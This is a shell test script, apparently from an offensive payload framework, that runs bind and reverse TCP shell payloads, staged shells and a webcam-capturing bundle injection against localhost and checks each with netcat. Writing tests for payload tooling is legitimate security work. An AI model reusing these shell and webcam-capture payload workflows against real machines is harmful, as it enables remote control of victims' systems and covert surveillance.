Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
#!/bin/sh
2

3
LPORT=13330
4

5
function run_payload()
6
{
7
    ./test_component $1 &
8
    sleep 1
9
}
10

11

12
function test_single_bind_tcp_shell()
13
{
14
    run_payload ../../bin/single_bind_tcp_shell.bin
15

16
    echo "expr 1234 + 5678" | nc -4 -vv -w 5 localhost $LPORT | grep "6912"
17

18
    wait
19
    
20
    return $?
21
}
22

23
function test_single_reverse_tcp_shell()
24
{
25
    (echo "expr 1234 + 5678" | nc -4 -vv -w 5 -l localhost $LPORT | grep "6912"; RESULT=$?) &
26
    
27
    sleep 1
28
    
29
    (./test_component ../../bin/single_reverse_tcp_shell.bin)
30

31
    wait
32
    
33
    return $RESULT
34
}
35

36
function test_staged_bind_tcp_shell()
37
{
38
    run_payload ../../bin/stager_bind_tcp.bin
39

40
    (./write_size_and_data.rb ../../bin/stage_shell.bin ; echo "expr 1234 + 5678" ) | nc -4 -vv -w 5 localhost $LPORT | grep "6912"
41

42
    wait
43
    
44
    return $?
45
}
46

47
function test_staged_reverse_tcp_shell()
48
{
49
    ((./write_size_and_data.rb ../../bin/stage_shell.bin; echo "expr 1234 + 5678" ) | nc -4 -vv -w 5 -l localhost $LPORT | grep "6912"; RESULT=$?) &
50
    
51
    sleep 1
52
    
53
    ./test_component ../../bin/stager_reverse_tcp.bin
54

55
    wait
56
    
57
    return $RESULT
58
}
59

60
function test_staged_bind_tcp_bundleinject()
61
{
62
    # Setup
63
    run_payload ../../bin/stager_bind_tcp.bin
64

65
    # Test
66
    TMPFILE=`mktemp isightXXXXXX` || exit 1
67
    ( ./write_size_and_data.rb ../../bin/stage_bundleinject.bin ; ./write_size_and_data.rb ../../../../bundles/isight/isight.bundle ) | nc -4 -vv -w 5 localhost $LPORT | (dd bs=1 skip=4 of=$TMPFILE)
68

69
    # Verify
70
    file $TMPFILE | grep JPEG
71
    RESULT=$?
72

73
    # Cleanup
74
    rm $TMPFILE
75

76
    wait
77

78
    return $RESULT
79
}
80

81
function test_staged_reverse_tcp_bundleinject()
82
{
83
    # Setup
84
    TMPFILE=`mktemp isightXXXXXX` || exit 1
85
    
86
    (( ./write_size_and_data.rb ../../bin/stage_bundleinject.bin ; ./write_size_and_data.rb ../../../../bundles/isight/isight.bundle ) | nc -4 -vv -l -w 5 localhost $LPORT | dd bs=1 skip=4 of=$TMPFILE) &
87
    sleep 1
88

89
    run_payload ../../bin/stager_reverse_tcp.bin
90

91
    wait
92

93
    # Verify
94
    file $TMPFILE | grep JPEG
95
    RESULT=$?
96

97
    if [ $RESULT -eq 0 ]; then
98
        # Cleanup
99
	rm $TMPFILE
100
    fi
101

102
    return $RESULT
103
}
104

105
SLEEP=65
106

107
echo "==> Testing single_reverse_tcp_shell..."
108
test_single_reverse_tcp_shell || exit 1
109
echo "Sleeping $SLEEP seconds..."
110
sleep $SLEEP
111

112
echo "==> Testing single_bind_tcp_shell..."
113
test_single_bind_tcp_shell || exit 1
114
echo "Sleeping $SLEEP seconds..."
115
sleep $SLEEP
116

117
echo "==> Testing stager_bind_tcp + stage_shell..."
118
test_staged_bind_tcp_shell || exit 1
119
echo "Sleeping $SLEEP seconds..."
120
sleep $SLEEP
121

122
echo "==> Testing stager_reverse_tcp + stage_shell..."
123
test_staged_reverse_tcp_shell || exit 1
124
echo "Sleeping $SLEEP seconds..."
125
sleep $SLEEP
126

127
echo "==> Testing stager_bind_tcp + bundleinject + isight.bundle..."
128
test_staged_bind_tcp_bundleinject || exit 1
129
echo "Sleeping $SLEEP seconds..."
130
sleep $SLEEP
131

132
echo "==> Testing stager_reverse_tcp + bundleinject + isight.bundle..."
133
test_staged_reverse_tcp_bundleinject || exit 1
134
echo "Sleeping $SLEEP seconds..."
135

136
echo
137
echo "==> All tests passed successfully!"
138
echo
139

140